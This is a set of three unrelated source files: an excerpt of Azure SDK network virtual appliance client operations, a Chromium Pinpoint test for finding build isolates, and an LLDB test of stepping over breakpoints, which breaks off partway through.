'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('NetworkVirtualAppliance', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkVirtualAppliances/{networkVirtualApplianceName}'} # type: ignore
def update_tags(
self,
resource_group_name, # type: str
network_virtual_appliance_name, # type: str
parameters, # type: "_models.TagsObject"
**kwargs # type: Any
):
# type: (...) -> "_models.NetworkVirtualAppliance"
"""Updates a Network Virtual Appliance.
:param resource_group_name: The resource group name of Network Virtual Appliance.
:type resource_group_name: str
:param network_virtual_appliance_name: The name of Network Virtual Appliance being updated.
:type network_virtual_appliance_name: str
:param parameters: Parameters supplied to Update Network Virtual Appliance Tags.
:type parameters: ~azure.mgmt.network.v2020_03_01.models.TagsObject
:keyword callable cls: A custom type or function that will be passed the direct response
:return: NetworkVirtualAppliance, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2020_03_01.models.NetworkVirtualAppliance
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.NetworkVirtualAppliance"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-03-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.update_tags.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkVirtualApplianceName': self._serialize.url("network_virtual_appliance_name", network_virtual_appliance_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'TagsObject')
body_content_kwargs['content'] = body_content
request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('NetworkVirtualAppliance', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
update_tags.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkVirtualAppliances/{networkVirtualApplianceName}'} # type: ignore
def _create_or_update_initial(
self,
resource_group_name, # type: str
network_virtual_appliance_name, # type: str
parameters, # type: "_models.NetworkVirtualAppliance"
**kwargs # type: Any
):
# type: (...) -> "_models.NetworkVirtualAppliance"
cls = kwargs.pop('cls', None) # type: ClsType["_models.NetworkVirtualAppliance"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-03-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self._create_or_update_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkVirtualApplianceName': self._serialize.url("network_virtual_appliance_name", network_virtual_appliance_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'NetworkVirtualAppliance')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('NetworkVirtualAppliance', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('NetworkVirtualAppliance', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_create_or_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkVirtualAppliances/{networkVirtualApplianceName}'} # type: ignore
def begin_create_or_update(
self,
resource_group_name, # type: str
network_virtual_appliance_name, # type: str
parameters, # type: "_models.NetworkVirtualAppliance"
**kwargs # type: Any
):
# type: (...) -> LROPoller["_models.NetworkVirtualAppliance"]
"""Creates or updates the specified Network Virtual Appliance.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param network_virtual_appliance_name: The name of Network Virtual Appliance.
:type network_virtual_appliance_name: str
:param parameters: Parameters supplied to the create or update Network Virtual Appliance.
:type parameters: ~azure.mgmt.network.v2020_03_01.models.NetworkVirtualAppliance
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling.
Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either NetworkVirtualAppliance or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[~azure.mgmt.network.v2020_03_01.models.NetworkVirtualAppliance]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.NetworkVirtualAppliance"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._create_or_update_initial(
resource_group_name=resource_group_name,
network_virtual_appliance_name=network_virtual_appliance_name,
parameters=parameters,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('NetworkVirtualAppliance', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkVirtualApplianceName': self._serialize.url("network_virtual_appliance_name", network_virtual_appliance_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = ARMPolling(lro_delay, lro_options={'final-state-via': 'azure-async-operation'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkVirtualAppliances/{networkVirtualApplianceName}'} # type: ignore
def list_by_resource_group(
self,
resource_group_name, # type: str
**kwargs # type: Any
):
# type: (...) -> Iterable["_models.NetworkVirtualApplianceListResult"]
"""Lists all Network Virtual Appliances in a resource group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either NetworkVirtualApplianceListResult or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.network.v2020_03_01.models.NetworkVirtualApplianceListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.NetworkVirtualApplianceListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-03-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_by_resource_group.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('NetworkVirtualApplianceListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_by_resource_group.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkVirtualAppliances'} # type: ignore
def list(
self,
**kwargs # type: Any
):
# type: (...) -> Iterable["_models.NetworkVirtualApplianceListResult"]
"""Gets all Network Virtual Appliances in a subscription.
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either NetworkVirtualApplianceListResult or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.network.v2020_03_01.models.NetworkVirtualApplianceListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.NetworkVirtualApplianceListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-03-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('NetworkVirtualApplianceListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Network/networkVirtualAppliances'} # type: ignore
|
|
# Copyright 2019 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
import mock
from dashboard.pinpoint import test
from dashboard.pinpoint.models import change as change_module
from dashboard.pinpoint.models import event as event_module
from dashboard.pinpoint.models import isolate
from dashboard.pinpoint.models import job as job_module
from dashboard.pinpoint.models import task as task_module
from dashboard.pinpoint.models.tasks import find_isolate
# The find_isolate Evaluator is special because it's meant to handle a "leaf"
# task in a graph, so we can test the evaluator on its own without setting up
# dependencies.
class FindIsolateEvaluatorBase(test.TestCase):
def setUp(self):
super(FindIsolateEvaluatorBase, self).setUp()
self.maxDiff = None # pylint: disable=invalid-name
self.job = job_module.Job.New((), ())
task_module.PopulateTaskGraph(
self.job,
find_isolate.CreateGraph(
find_isolate.TaskOptions(
builder='Mac Builder',
target='telemetry_perf_tests',
bucket='luci.bucket',
change=change_module.Change.FromDict({
'commits': [{
'repository': 'chromium',
'git_hash': '7c7e90be',
}],
}))))
@mock.patch('dashboard.services.buildbucket_service.GetJobStatus')
@mock.patch('dashboard.services.buildbucket_service.Put')
class FindIsolateEvaluatorTest(FindIsolateEvaluatorBase):
def testInitiate_FoundIsolate(self, *_):
# Seed the isolate for this change.
change = change_module.Change(
commits=[change_module.Commit('chromium', '7c7e90be')])
isolate.Put((('Mac Builder', change, 'telemetry_perf_tests',
'https://isolate.server', '7c7e90be'),))
# Then ensure that we can find the seeded isolate for the specified
# revision.
self.assertDictEqual(
{
'find_isolate_chromium@7c7e90be': {
'bucket': 'luci.bucket',
'builder': 'Mac Builder',
'change': mock.ANY,
'isolate_hash': '7c7e90be',
'isolate_server': 'https://isolate.server',
'status': 'completed',
'target': 'telemetry_perf_tests',
},
},
task_module.Evaluate(
self.job,
event_module.Event(
type='initiate',
target_task='find_isolate_chromium@7c7e90be',
payload={}), find_isolate.Evaluator(self.job)))
def testInitiate_ScheduleBuild(self, put, _):
# We then need to make sure that the buildbucket put was called.
put.return_value = {'build': {'id': '345982437987234'}}
# This time we don't seed the isolate for the change to force the build.
self.assertDictEqual(
{
'find_isolate_chromium@7c7e90be': {
'bucket': 'luci.bucket',
'buildbucket_result': {
'build': {
'id': '345982437987234'
},
},
'builder': 'Mac Builder',
'change': mock.ANY,
'status': 'ongoing',
'target': 'telemetry_perf_tests',
'tries': 1,
},
},
task_module.Evaluate(
self.job,
event_module.Event(
type='initiate',
target_task='find_isolate_chromium@7c7e90be',
payload={}), find_isolate.Evaluator(self.job)))
self.assertEqual(1, put.call_count)
def testUpdate_BuildSuccessful(self, put, get_build_status):
# First we're going to initiate so we have a build scheduled.
put.return_value = {
'build': {
'id': '345982437987234',
'url': 'https://some.buildbucket/url'
}
}
self.assertDictEqual(
{
'find_isolate_chromium@7c7e90be': {
'bucket': 'luci.bucket',
'buildbucket_result': {
'build': {
'id': '345982437987234',
'url': 'https://some.buildbucket/url'
},
},
'builder': 'Mac Builder',
'change': mock.ANY,
'status': 'ongoing',
'target': 'telemetry_perf_tests',
'tries': 1,
},
},
task_module.Evaluate(
self.job,
event_module.Event(
type='initiate',
target_task='find_isolate_chromium@7c7e90be',
payload={}), find_isolate.Evaluator(self.job)))
self.assertEqual(1, put.call_count)
# Now we send an update event which should cause us to poll the status of
# the build on demand.
json = """
{
"properties": {
"got_revision_cp": "refs/heads/master@7c7e90be",
"isolate_server": "https://isolate.server",
"swarm_hashes_refs/heads/master(at)7c7e90be_without_patch":
{"telemetry_perf_tests": "192923affe212adf"}
}
}"""
get_build_status.return_value = {
'build': {
'status': 'COMPLETED',
'result': 'SUCCESS',
'result_details_json': json,
}
}
self.assertDictEqual(
{
'find_isolate_chromium@7c7e90be': {
'bucket': 'luci.bucket',
'buildbucket_job_status': mock.ANY,
'buildbucket_result': {
'build': {
'id': '345982437987234',
'url': 'https://some.buildbucket/url'
}
},
'builder': 'Mac Builder',
'build_url': mock.ANY,
'change': mock.ANY,
'isolate_hash': '192923affe212adf',
'isolate_server': 'https://isolate.server',
'status': 'completed',
'target': 'telemetry_perf_tests',
'tries': 1,
},
},
task_module.Evaluate(
self.job,
event_module.Event(
type='update',
target_task='find_isolate_chromium@7c7e90be',
payload={'status': 'build_completed'}),
find_isolate.Evaluator(self.job)))
self.assertEqual(1, get_build_status.call_count)
self.assertEqual(
{
'find_isolate_chromium@7c7e90be': {
'completed':
True,
'exception':
None,
'details': [{
'key': 'builder',
'value': 'Mac Builder',
'url': None,
}, {
'key': 'build',
'value': '345982437987234',
'url': mock.ANY,
}, {
'key':
'isolate',
'value':
'192923affe212adf',
'url':
'https://isolate.server/browse?digest=192923affe212adf',
}]
}
},
task_module.Evaluate(
self.job,
event_module.Event(
type='unimportant', target_task=None, payload={}),
find_isolate.Serializer()))
@mock.patch('dashboard.services.buildbucket_service.GetJobStatus')
class FindIsolateEvaluatorUpdateTests(FindIsolateEvaluatorBase):
def setUp(self):
super(FindIsolateEvaluatorUpdateTests, self).setUp()
# Here we set up the pre-requisite for polling, where we've already had a
# successful build scheduled.
with mock.patch('dashboard.services.buildbucket_service.Put') as put:
put.return_value = {'build': {'id': '345982437987234'}}
self.assertDictEqual(
{
'find_isolate_chromium@7c7e90be': {
'buildbucket_result': {
'build': {
'id': '345982437987234'
}
},
'status': 'ongoing',
'builder': 'Mac Builder',
'bucket': 'luci.bucket',
'change': mock.ANY,
'target': 'telemetry_perf_tests',
'tries': 1,
},
},
task_module.Evaluate(
self.job,
event_module.Event(
type='initiate',
target_task='find_isolate_chromium@7c7e90be',
payload={}), find_isolate.Evaluator(self.job)))
self.assertEqual(1, put.call_count)
def testUpdate_BuildFailed_HardFailure(self, get_build_status):
get_build_status.return_value = {
'build': {
'status': 'COMPLETED',
'result': 'FAILURE',
'result_details_json': '{}',
}
}
self.assertDictEqual(
{
'find_isolate_chromium@7c7e90be': {
'bucket': 'luci.bucket',
'buildbucket_result': {
'build': {
'id': '345982437987234'
},
},
'buildbucket_job_status': mock.ANY,
'builder': 'Mac Builder',
'build_url': mock.ANY,
'change': mock.ANY,
'status': 'failed',
'target': 'telemetry_perf_tests',
'errors': [mock.ANY],
'tries': 1,
},
},
task_module.Evaluate(
self.job,
event_module.Event(
type='update',
target_task='find_isolate_chromium@7c7e90be',
payload={'status': 'build_completed'}),
find_isolate.Evaluator(self.job)))
self.assertEqual(1, get_build_status.call_count)
self.assertEqual(
{
'find_isolate_chromium@7c7e90be': {
'completed':
True,
'exception':
mock.ANY,
'details': [{
'key': 'builder',
'value': 'Mac Builder',
'url': None,
}, {
'key': 'build',
'value': '345982437987234',
'url': mock.ANY,
}]
}
},
task_module.Evaluate(
self.job,
event_module.Event(
type='unimportant', target_task=None, payload={}),
find_isolate.Serializer()))
def testUpdate_BuildFailed_Cancelled(self, get_build_status):
get_build_status.return_value = {
'build': {
'status': 'COMPLETED',
'result': 'CANCELLED',
'result_details_json': '{}',
}
}
self.assertDictEqual(
{
'find_isolate_chromium@7c7e90be': {
'bucket': 'luci.bucket',
'builder': 'Mac Builder',
'buildbucket_result': {
'build': {
'id': '345982437987234'
}
},
'buildbucket_job_status': {
'status': 'COMPLETED',
'result': 'CANCELLED',
'result_details_json': '{}',
},
'build_url': mock.ANY,
'change': mock.ANY,
'errors': [mock.ANY],
'status': 'cancelled',
'target': 'telemetry_perf_tests',
'tries': 1,
},
},
task_module.Evaluate(
self.job,
event_module.Event(
type='update',
target_task='find_isolate_chromium@7c7e90be',
payload={'status': 'build_completed'}),
find_isolate.Evaluator(self.job)))
self.assertEqual(1, get_build_status.call_count)
def testUpdate_MissingIsolates_Server(self, get_build_status):
json = """
{
"properties": {
"got_revision_cp": "refs/heads/master@7c7e90be",
"swarm_hashes_refs/heads/master(at)7c7e90be_without_patch":
{"telemetry_perf_tests": "192923affe212adf"}
}
}"""
get_build_status.return_value = {
'build': {
'status': 'COMPLETED',
'result': 'SUCCESS',
'result_details_json': json,
}
}
self.assertDictEqual(
{
'find_isolate_chromium@7c7e90be': {
'bucket': 'luci.bucket',
'buildbucket_result': {
'build': {
'id': '345982437987234'
}
},
'buildbucket_job_status': mock.ANY,
'change': mock.ANY,
'builder': 'Mac Builder',
'build_url': mock.ANY,
'status': 'failed',
'errors': mock.ANY,
'tries': 1,
'target': 'telemetry_perf_tests',
},
},
task_module.Evaluate(
self.job,
event_module.Event(
type='update',
target_task='find_isolate_chromium@7c7e90be',
payload={'status': 'build_completed'}),
find_isolate.Evaluator(self.job)))
self.assertEqual(1, get_build_status.call_count)
def testUpdate_MissingIsolates_Revision(self, get_build_status):
json = """
{
"properties": {
"isolate_server": "https://isolate.server",
"swarm_hashes_refs/heads/master(at)7c7e90be_without_patch":
{"telemetry_perf_tests": "192923affe212adf"}
}
}"""
get_build_status.return_value = {
'build': {
'status': 'COMPLETED',
'result': 'SUCCESS',
'result_details_json': json,
}
}
self.assertDictEqual(
{
'find_isolate_chromium@7c7e90be': {
'bucket': 'luci.bucket',
'builder': 'Mac Builder',
'build_url': mock.ANY,
'buildbucket_result': {
'build': {
'id': '345982437987234'
}
},
'buildbucket_job_status': mock.ANY,
'change': mock.ANY,
'status': 'failed',
'target': 'telemetry_perf_tests',
'tries': 1,
'errors': mock.ANY,
},
},
task_module.Evaluate(
self.job,
event_module.Event(
type='update',
target_task='find_isolate_chromium@7c7e90be',
payload={'status': 'build_completed'}),
find_isolate.Evaluator(self.job)))
self.assertEqual(1, get_build_status.call_count)
def testUpdate_MissingIsolates_Hashes(self, get_build_status):
json = """
{
"properties": {
"got_revision_cp": "refs/heads/master@7c7e90be",
"isolate_server": "https://isolate.server"
}
}"""
get_build_status.return_value = {
'build': {
'status': 'COMPLETED',
'result': 'SUCCESS',
'result_details_json': json,
}
}
self.assertDictEqual(
{
'find_isolate_chromium@7c7e90be': {
'bucket': 'luci.bucket',
'builder': 'Mac Builder',
'build_url': mock.ANY,
'buildbucket_result': {
'build': {
'id': '345982437987234'
}
},
'buildbucket_job_status': mock.ANY,
'change': mock.ANY,
'status': 'failed',
'errors': mock.ANY,
'target': 'telemetry_perf_tests',
'tries': 1,
},
},
task_module.Evaluate(
self.job,
event_module.Event(
type='update',
target_task='find_isolate_chromium@7c7e90be',
payload={'status': 'build_completed'}),
find_isolate.Evaluator(self.job)))
self.assertEqual(1, get_build_status.call_count)
def testUpdate_MissingIsolates_InvalidJson(self, get_build_status):
json = '{ invalid }'
get_build_status.return_value = {
'build': {
'status': 'COMPLETED',
'result': 'SUCCESS',
'result_details_json': json,
}
}
self.assertDictEqual(
{
'find_isolate_chromium@7c7e90be': {
'bucket': 'luci.bucket',
'build_url': mock.ANY,
'buildbucket_result': {
'build': {
'id': '345982437987234'
}
},
'buildbucket_job_status': mock.ANY,
'builder': 'Mac Builder',
'change': mock.ANY,
'status': 'failed',
'errors': mock.ANY,
'target': 'telemetry_perf_tests',
'tries': 1,
},
},
task_module.Evaluate(
self.job,
event_module.Event(
type='update',
target_task='find_isolate_chromium@7c7e90be',
payload={'status': 'build_completed'}),
find_isolate.Evaluator(self.job)))
self.assertEqual(1, get_build_status.call_count)
def testUpdate_BuildFailed_ScheduleRetry(self, *_):
self.skipTest('Not implemented yet.')
|
|
"""Test stepping over vrs. hitting breakpoints & subsequent stepping in various forms."""
import lldb
from lldbsuite.test.decorators import *
from lldbsuite.test.lldbtest import *
from lldbsuite.test import lldbutil
class TestCStepping(TestBase):
mydir = TestBase.compute_mydir(__file__)
def setUp(self):
# Call super's setUp().
TestBase.setUp(self)
# Find the line numbers that we will step to in main:
self.main_source = "main.c"
@add_test_categories(['pyapi', 'basic_process'])
@expectedFailureAll(oslist=['freebsd'], bugnumber='llvm.org/pr17932')
@expectedFailureAll(oslist=["linux"], bugnumber="llvm.org/pr14437")
@expectedFailureAll(oslist=["windows"], bugnumber="llvm.org/pr24777")
@expectedFailureNetBSD
def test_and_python_api(self):
"""Test stepping over vrs. hitting breakpoints & subsequent stepping in various forms."""
self.build()
exe = self.getBuildArtifact("a.out")
target = self.dbg.CreateTarget(exe)
self.assertTrue(target, VALID_TARGET)
self.main_source_spec = lldb.SBFileSpec(self.main_source)
breakpoints_to_disable = []
break_1_in_main = target.BreakpointCreateBySourceRegex(
'// frame select 2, thread step-out while stopped at .c.1..',
self.main_source_spec)
self.assertTrue(break_1_in_main, VALID_BREAKPOINT)
breakpoints_to_disable.append(break_1_in_main)
break_in_a = target.BreakpointCreateBySourceRegex(
'// break here to stop in a before calling b', self.main_source_spec)
self.assertTrue(break_in_a, VALID_BREAKPOINT)
breakpoints_to_disable.append(break_in_a)
break_in_b = target.BreakpointCreateBySourceRegex(
'// thread step-out while stopped at .c.2..', self.main_source_spec)
self.assertTrue(break_in_b, VALID_BREAKPOINT)
breakpoints_to_disable.append(break_in_b)
break_in_c = target.BreakpointCreateBySourceRegex(
'// Find the line number of function .c. here.', self.main_source_spec)
self.assertTrue(break_in_c, VALID_BREAKPOINT)
breakpoints_to_disable.append(break_in_c)
# Now launch the process, and do not stop at entry point.
process = target.LaunchSimple(
None, None, self.get_process_working_directory())
self.assertTrue(process, PROCESS_IS_VALID)
# The stop reason of the thread should be breakpoint.
threads = lldbutil.get_threads_stopped_at_breakpoint(
process, break_1_in_main)
if len(threads) != 1:
self.fail("Failed to stop at first breakpoint in main.")
thread = threads[0]
# Get the stop id and for fun make sure it increases:
old_stop_id = process.GetStopID()
# Now step over, which should cause us to hit the breakpoint in "a"
thread.StepOver()
# The stop reason of the thread should be breakpoint.
threads = lldbutil.get_threads_stopped_at_breakpoint(
process, break_in_a)
if len(threads) != 1:
self.fail("Failed to stop at breakpoint in a.")
# Check that the stop ID increases:
new_stop_id = process.GetStopID()
self.assertTrue(
new_stop_id > old_stop_id,
"Stop ID increases monotonically.")
thread = threads[0]
# Step over, and we should hit the breakpoint in b:
thread.StepOver()
threads = lldbutil.get_threads_stopped_at_breakpoint(
process, break_in_b)
if len(threads) != 1:
self.fail("Failed to stop at breakpoint in b.")
thread = threads[0]
# Now try running some function, and make sure that we still end up in the same place
# and with the same stop reason.
frame = thread.GetFrameAtIndex(0)
current_line = frame.GetLineEntry().GetLine()
current_file = frame.GetLineEntry().GetFileSpec()
current_bp = []
current_bp.append(thread.GetStopReasonDataAtIndex(0))
current_bp.append(thread.GetStopReasonDataAtIndex(1))
stop_id_before_expression = process.GetStopID()
stop_id_before_including_expressions = process.GetStopID(True)
frame.EvaluateExpression("(int) printf (print_string)")
frame = thread.GetFrameAtIndex(0)
self.assertTrue(
current_line == frame.GetLineEntry().GetLine(),
"The line stayed the same after expression.")
self.assertTrue(
current_file == frame.GetLineEntry().GetFileSpec(),
"The file stayed the same after expression.")
self.assertTrue(
thread.GetStopReason() == lldb.eStopReasonBreakpoint,
"We still say we stopped for a breakpoint.")
self.assertTrue(thread.GetStopReasonDataAtIndex(0) == current_bp[
0] and thread.GetStopReasonDataAtIndex(1) == current_bp[1], "And it is the same breakpoint.")
# Also make sure running the expression didn't change the public stop id
# but did change if we are asking for expression stops as well.
stop_id_after_expression = process.GetStopID()
stop_id_after_including_expressions = process.GetStopID(True)
self.assertTrue(
stop_id_before_expression == stop_id_after_expression,
"Expression calling doesn't change stop ID")
self.assertTrue(
stop_id_after_including_expressions > stop_id_before_including_expressions,
"Stop ID including expressions increments over expression call.")
# Do the same thing with an expression that's going to crash, and make
# sure we are still unchanged.
frame.EvaluateExpression("((char *) 0)[0] = 'a'")
frame = thread.GetFrameAtIndex(0)
self.assertTrue(
current_line == frame.GetLineEntry().GetLine(),
"The line stayed the same after expression.")
self.assertTrue(
current_file == frame.GetLineEntry().GetFileSpec(),
"The file stayed the same after expression.")
self.assertTrue(
thread.GetStopReason() == lldb.eStopReasonBreakpoint,
"We still say we stopped for a breakpoint.")
self.assertTrue(thread.GetStopReasonDataAtIndex(0) == current_bp[
0] and thread.GetStopReasonDataAtIndex(1) == current_bp[1], "And it is the same breakpoint.")
# Now continue and make sure we just complete the step:
# Disable all our breakpoints first - sometimes the compiler puts two line table entries in for the
# breakpoint a "b" and we don't want to hit that.
for bkpt in breakpoints_to_disable:
bkpt.SetEnabled(False)
process.Continue()
self.assertTrue(thread.GetFrameAtIndex(0).GetFunctionName() == "a")
self.assertTrue(thread.GetStopReason() == lldb.eStopReasonPlanComplete)
# And one more time should get us back to main:
process.Continue()
self.assertTrue(thread.GetFrameAtIndex(0).GetFunctionName() == "main")
self.assertTrue(thread.GetStopReason() == lldb.eStopReasonPlanComplete)
# Now make sure we can call a function, break in the called function,
# then have "continue" get us back out again:
frame = thread.GetFrameAtIndex(0)
frame = thread.GetFrameAtIndex(0)
current_line = frame.GetLineEntry().GetLine()
current_file = frame.GetLineEntry().GetFileSpec()
break_in_b.SetEnabled(True)
options = lldb.SBExpressionOptions()
options.SetIgnoreBreakpoints(False)
options.SetFetchDynamicValue(False)
options.SetUnwindOnError(False)
frame.EvaluateExpression("b (4)", options)
threads = lldbutil.get_threads_stopped_at_breakpoint(
process, break_in_b)
if len(threads) != 1:
self.fail("Failed to stop at breakpoint in b when calling b.")
thread = threads[0]
# So do a step over here to make sure we can still do that:
